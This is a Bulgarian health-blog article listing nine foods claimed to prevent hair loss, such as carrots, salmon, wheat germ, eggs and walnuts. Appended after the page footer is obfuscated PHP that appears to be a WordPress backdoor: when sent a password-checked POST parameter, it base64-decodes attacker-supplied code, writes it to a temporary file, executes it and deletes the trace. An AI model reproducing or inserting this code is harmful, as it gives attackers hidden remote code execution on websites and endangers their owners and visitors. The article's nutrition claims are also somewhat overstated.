9 храни, които спират косопада | Косопад

9 храни, които спират косопада

kosa-zdrave

Храненето е много важно за здравето на косата. Когато обаче не приемаме достатъчно количество от определено вещество или вещества, косата отслабва, а с течение на времето губи обема си.

Това състояние обаче лесно може да се контролира. Направете някои промени в храненето си, така че да получавате необходимите вещества.

1 Моркови

Полезни са за кожата и косата, заради значимото съдържание на бетаракотени, които се синтезират в тялото като витамин А. Това вещество помага за правилното усвояване на мазнините от скалпа и предпазва от падане на косата.

2 Сьомга

Омега- 3 мастните киселини и протеините, които се съдържат в сьомгата, заздравяват космените фоликули и намаляват косопада. Тези вещества регулират производството на мазнини в скалпа, подобряват кръвообращението и контролират съхненето на косата и късането.

3 Житен зародиш

Редовната консумация на житен зародиш спира косопада. Съдържа много вещества, които подпомагат растежа и предпазват от косопад: витамин А, витамин С, растителни протеини, мед, цинк, желязо, фибри.

4 Семена от слънчоглед

Също съдържа вещества, които подпомагат растежа на косата, като я правят дълга, гъста и силна: витамин Е, витамин В комплекс, калий, желязо, селен, калций, протеини.

5 Овес

Това е една от храните, които трябва да консумирате редовно. Свойствата му увеличават физическата и умствената издръжливост, но също имунната система, кръвообращението и пр. Съдържа минерали като цинк и селен, които спират прекомерния косопад.

6 Яйце

Поддържа косата здрава, гъста и обилна. Съдържа много протеини, биотин и желязо.

7 Червено месо

Съдържа големи количества протеини, витамин В и желязо.

8 Боб

Богат е на протеини, фибра и витамини В комплекс. Съдържанието на цинк и витамин С предпазва косата от падане.

9 Орехи

Богати са на протеини и антиоксиданти, които са много полезни за косата.

07. юли 2016 15:47:37 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}